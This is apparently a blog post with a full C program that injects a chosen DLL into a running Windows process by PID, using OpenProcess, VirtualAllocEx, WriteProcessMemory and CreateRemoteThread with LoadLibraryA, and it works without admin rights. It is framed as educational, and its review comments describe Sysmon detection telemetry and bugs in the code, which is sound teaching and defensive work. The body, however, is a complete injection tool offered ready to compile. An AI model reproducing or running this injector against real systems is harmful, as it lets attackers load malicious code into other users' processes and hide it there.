In a previous post on DLL injection, I hardcoded the code for the DLL. In this post, I am giving you the opportunity to specify your process ID and DLL to be injected.
/*
 * DLL Injection - using create remote thread
 * This is a follow-up to my previous blog posts and as in the previous instance,
 * this is purely for educational purposes.
 * https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows_23.html
 * https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows.html
 *
 * In those previous posts, I required admin privileges. In this post, I'm working without admin privileges
 * Author Nik Alleyne
 * Author Blog: www.securitynik.com
 * File: dllInjection-CreateRemoteThread.c
 * Date: October 4, 2020
 *
 * Reviewer notes (defensive reading of this listing):
 *  - The sequence below -- OpenProcess on a foreign PID, VirtualAllocEx,
 *    WriteProcessMemory, CreateRemoteThread pointing at LoadLibraryA -- is the
 *    textbook remote-thread injection chain. Each of those calls is an
 *    auditable boundary; Sysmon Event ID 10 (ProcessAccess) and Event ID 8
 *    (CreateRemoteThread) are the usual telemetry for the first and last step,
 *    and a DLL appearing in a process it was never imported by is the
 *    observable result.
 *  - The file uses `nullptr` and a wide literal for GetModuleHandle, so it is
 *    evidently built as C++ (or C23) with UNICODE defined; plain C11 will not
 *    accept `nullptr`. TODO confirm the intended build settings.
 */

#include <windows.h>
#include <Psapi.h>
#include <stdio.h>

/*
 * Entry point.
 *
 * argv[1]  decimal PID of the target process (parsed with atoi(), so a
 *          non-numeric value silently becomes 0 -- no error is reported).
 * argv[2]  path to the DLL that LoadLibraryA in the target will receive.
 *
 * Returns 0 on success, -1 on any failure (usage error, process not found,
 * or a failing Win32 call; the last error code is printed where available).
 */
int main(int argc, char* argv[])
{
    // Clear the screen before getting started
    // (cosmetic; spawns a cmd.exe for "cls" -- visible as a child process)
    system("cls");

    // Check to see if the number of arguments, equals 3.
    // First argument is the program, second is the process PID and third is the full path to the DLL
    if (argc != 3)
    {
        printf(" ===========================================================================\n");
        printf("[*] Usage info. | dllInjection-CreateRemoteThread.exe \n");
        printf("[*]");
        printf("dllInjection-CreateRemoteThread.exe PID Path to DLL \n");
        printf("\t eg. dllInjection-CreateRemoteThread.exe 3000 c:\\tmp\\mydll.dll \n");
        printf(" ===========================================================================\n");
        return -1;
    }

    printf(" Beginning the DLL Injection Process ... \n");
    printf("------------------------------------------------------------------------------ \n");
    Sleep(1000);

    printf("[*] Enumerating all processes ... \n");
    Sleep(1000);

    // Setup point to the array which will hold the processes
    // Fixed 4096-entry buffer: EnumProcesses fills as many PIDs as fit and
    // reports the byte count in sizeOfArray. If the machine has more than
    // 4096 processes the list is silently truncated and the PID check below
    // can give a false "not found".
    DWORD myProcessList[4096], sizeOfArray, totalProcesses;

    if (!EnumProcesses(myProcessList, sizeof(myProcessList), &sizeOfArray))
    {
        printf(" [!] Error Code: %u was encountered while retrieving processes information \n", GetLastError());
        return -1;
    }

    // calculate the number of processes returned (bytes -> DWORD entries)
    totalProcesses = sizeOfArray / sizeof(DWORD);
    printf(" [*] There were %u processes found \n", totalProcesses);
    Sleep(1000);

    printf("[*] Searching for process with PID:%u \n", atoi(argv[1]));

    // Create a variable to track if the PID was found
    BOOL pidFound = FALSE;

    // Find the process with PID of interest
    // first declare a counter for the array
    // NOTE(review): the existence check is only a courtesy -- OpenProcess
    // below reports the same condition itself, and atoi(argv[1]) is
    // re-evaluated on every iteration.
    unsigned int count = 0;
    for (count; count < totalProcesses; count++)
        if (myProcessList[count] == atoi(argv[1]))
        {
            pidFound = TRUE;
            break;
        }

    if (!pidFound)
    {
        printf(" [!] Unable to locate the process with PID:%u \n", atoi(argv[1]));
        return -1;
    }

    printf(" [*] Process with PID:%u Found \n", atoi(argv[1]));
    Sleep(1000);

    // Now that the PID exists, open a handle to it.
    // PROCESS_ALL_ACCESS asks for every right on the target; CreateRemoteThread
    // is documented to need only PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION,
    // PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_VM_READ. Requesting the
    // full mask is both more than the demo uses and a stronger signal in
    // ProcessAccess telemetry. Without elevation this open only succeeds on
    // processes the caller's token is already allowed to open (same user,
    // not protected) -- TODO confirm which targets were used for the demo.
    printf("[+] Opening a handle to process with PID:%u ...\n", atoi(argv[1]));
    HANDLE myRemoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
    if (!myRemoteProcessHandle)
    {
        printf(" [!] Error %u occured while attempting to get a handle \n", GetLastError());
        return -1;
    }
    printf(" [+] Handle 0x%p successfully opened \n", myRemoteProcessHandle);
    Sleep(1000);

    // Allocating space in memory
    // 256 bytes are requested for the DLL path string. Two review points:
    //  - the length of argv[2] is never compared against 256 before the
    //    write below, so the size relationship is unchecked;
    //  - the buffer only ever holds a string, so PAGE_EXECUTE_READWRITE grants
    //    execute permission this data does not need (least privilege).
    printf("[+] Allocating space in the memory of process with PID: %u \n", atoi(argv[1]));
    VOID* myRemoteProcessAddress = VirtualAllocEx(myRemoteProcessHandle, NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!myRemoteProcessAddress)
    {
        printf(" [!] Unable to allocate space in the process. Error code was %u \n", GetLastError());
        return -1;
    }
    printf(" [+] Space successfully allocated \n");
    Sleep(1000);

    // Writing DLL Path to process Memory
    // NOTE(review): strlen(argv[2]) excludes the terminating NUL, so the
    // terminator is never copied. LoadLibraryA requires a NUL-terminated
    // string; this only works because freshly committed pages are
    // zero-initialised, which is implicit rather than stated here.
    printf("[+] Writing to the process memory ... \n");
    if (!WriteProcessMemory(myRemoteProcessHandle, myRemoteProcessAddress, argv[2], strlen(argv[2]), nullptr))
    {
        printf(" [!] Error %u encountered while writing to the process with PID:%u memory \n", GetLastError(), atoi(argv[1]));
        return -1;
    }
    printf(" [+] Process memory successfully written ... \n");
    Sleep(1000);

    // Executing the remote thread
    // The thread's start routine is LoadLibraryA and its single argument is
    // the remote buffer holding the path. The address of LoadLibraryA is
    // resolved in *this* process; the call relies on kernel32.dll being mapped
    // at the same base in the target (true for system DLLs within one boot
    // session -- presumably what the author counts on; verify). The wide
    // literal passed to GetModuleHandle assumes a UNICODE build.
    printf("[+] Creating the remote thread ...\n");
    HANDLE myRemoteProcessNewThread = CreateRemoteThread(myRemoteProcessHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), myRemoteProcessAddress, 0, nullptr);
    if (!myRemoteProcessNewThread)
    {
        // NOTE(review): unlike the other failure paths, GetLastError() is not
        // printed here, so a failed CreateRemoteThread gives no error code.
        printf(" [!] Error occurred while creating remote thread!\n");
        return -1;
    }
    printf(" [+] Remote thread successfully created \n");
    Sleep(1000);

    // Close up shop
    // Only the process handle is closed; myRemoteProcessNewThread is neither
    // waited on nor closed, so the "done" message below can print before the
    // remote LoadLibraryA has finished and the thread handle leaks until exit.
    CloseHandle(myRemoteProcessHandle);
    printf("[*] I'm done my work. See ya and hope you enjoyed that demo! \n");
    return 0;
}

/*
 * References:
 * https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-modules-for-a-process
 * https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumprocesses
 * https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess
 * https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
 * https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
 *
 */
Have fun!